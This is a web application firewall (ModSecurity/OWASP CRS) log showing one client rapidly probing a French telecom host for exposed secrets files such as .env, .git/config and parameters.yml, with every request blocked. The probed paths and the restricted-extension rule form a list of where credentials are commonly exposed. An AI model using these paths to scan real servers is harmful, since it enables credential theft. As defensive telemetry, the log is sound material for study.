[Mon May 11 20:55:50.481888 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/administrator/.env"] [unique_id "agImNpYn-x0CHsbEbP2tJAAAAIQ"]
[Mon May 11 20:55:50.482075 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/administrator/.env"] [unique_id "agImNpYn-x0CHsbEbP2tJAAAAIQ"]
[Mon May 11 20:55:50.504028 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api-node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api-node/.env"] [unique_id "agImNpYn-x0CHsbEbP2tJQAAAI8"]
[Mon May 11 20:55:50.504208 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api-node/.env"] [unique_id "agImNpYn-x0CHsbEbP2tJQAAAI8"]
[Mon May 11 20:55:50.504394 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api-node/.env"] [unique_id "agImNpYn-x0CHsbEbP2tJQAAAI8"]
[Mon May 11 20:55:50.528368 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agImNpYn-x0CHsbEbP2tJwAAAIQ"]
[Mon May 11 20:55:50.528517 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agImNpYn-x0CHsbEbP2tJwAAAIQ"]
[Mon May 11 20:55:50.528703 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agImNpYn-x0CHsbEbP2tJwAAAIQ"]
[Mon May 11 20:55:50.655057 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api-backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api-backend/.env"] [unique_id "agImNpYn-x0CHsbEbP2tKwAAAIg"]
[Mon May 11 20:55:50.655271 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api-backend/.env"] [unique_id "agImNpYn-x0CHsbEbP2tKwAAAIg"]
[Mon May 11 20:55:50.655512 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api-backend/.env"] [unique_id "agImNpYn-x0CHsbEbP2tKwAAAIg"]
[Mon May 11 20:55:50.878874 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env.local"] [unique_id "agImNjP5Q_-MBliRCAxm8gAAABI"]
[Mon May 11 20:55:50.879023 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env.local"] [unique_id "agImNjP5Q_-MBliRCAxm8gAAABI"]
[Mon May 11 20:55:50.879217 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env.local"] [unique_id "agImNjP5Q_-MBliRCAxm8gAAABI"]
[Mon May 11 20:55:50.884907 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env.production"] [unique_id "agImNiMeXtzav-mi9SyxQgAAAM4"]
[Mon May 11 20:55:50.885057 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env.production"] [unique_id "agImNiMeXtzav-mi9SyxQgAAAM4"]
[Mon May 11 20:55:50.885251 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env.production"] [unique_id "agImNiMeXtzav-mi9SyxQgAAAM4"]
[Mon May 11 20:55:50.898039 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/development.ini"] [unique_id "agImNiMeXtzav-mi9SyxQwAAANA"]
[Mon May 11 20:55:50.898301 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/development.ini"] [unique_id "agImNiMeXtzav-mi9SyxQwAAANA"]
[Mon May 11 20:55:50.898492 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/development.ini"] [unique_id "agImNiMeXtzav-mi9SyxQwAAANA"]
[Mon May 11 20:55:50.902180 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/parameters.yml found within REQUEST_FILENAME: /app/config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/parameters.yml"] [unique_id "agImNjP5Q_-MBliRCAxm9QAAABI"]
[Mon May 11 20:55:50.902286 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/parameters.yml found within REQUEST_FILENAME: /app/config/parameters.yml.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/parameters.yml.dist"] [unique_id "agImNiMeXtzav-mi9SyxRAAAAM8"]
[Mon May 11 20:55:50.902327 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/parameters.yml"] [unique_id "agImNjP5Q_-MBliRCAxm9QAAABI"]
[Mon May 11 20:55:50.902441 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/parameters.yml.dist"] [unique_id "agImNiMeXtzav-mi9SyxRAAAAM8"]
[Mon May 11 20:55:50.902499 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/parameters.yml"] [unique_id "agImNjP5Q_-MBliRCAxm9QAAABI"]
[Mon May 11 20:55:50.902638 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/config/parameters.yml.dist"] [unique_id "agImNiMeXtzav-mi9SyxRAAAAM8"]
[Mon May 11 20:55:50.915575 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/apis/.env"] [unique_id "agImNjP5Q_-MBliRCAxm9gAAAAo"]
[Mon May 11 20:55:50.915721 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/apis/.env"] [unique_id "agImNjP5Q_-MBliRCAxm9gAAAAo"]
[Mon May 11 20:55:50.915898 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/apis/.env"] [unique_id "agImNjP5Q_-MBliRCAxm9gAAAAo"]
[Mon May 11 20:55:51.025414 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agImNyMeXtzav-mi9SyxSAAAAM8"]
[Mon May 11 20:55:51.025619 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agImNyMeXtzav-mi9SyxSAAAAM8"]
[Mon May 11 20:55:51.025822 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agImNyMeXtzav-mi9SyxSAAAAM8"]
[Mon May 11 20:55:51.034434 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /app/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/.git/config"] [unique_id "agImN5Yn-x0CHsbEbP2tNgAAAI8"]
[Mon May 11 20:55:51.034589 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/.git/config"] [unique_id "agImN5Yn-x0CHsbEbP2tNgAAAI8"]
[Mon May 11 20:55:51.034774 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/.git/config"] [unique_id "agImN5Yn-x0CHsbEbP2tNgAAAI8"]
[Mon May 11 20:55:51.058501 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/application/.env"] [unique_id "agImNzP5Q_-MBliRCAxm9wAAABM"]
[Mon May 11 20:55:51.058658 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/application/.env"] [unique_id "agImNzP5Q_-MBliRCAxm9wAAABM"]
[Mon May 11 20:55:51.058863 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/application/.env"] [unique_id "agImNzP5Q_-MBliRCAxm9wAAABM"]
[Mon May 11 20:55:51.059690 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/apps/.env"] [unique_id "agImN_jVc-A-CSptvm1xLQAAAEs"]
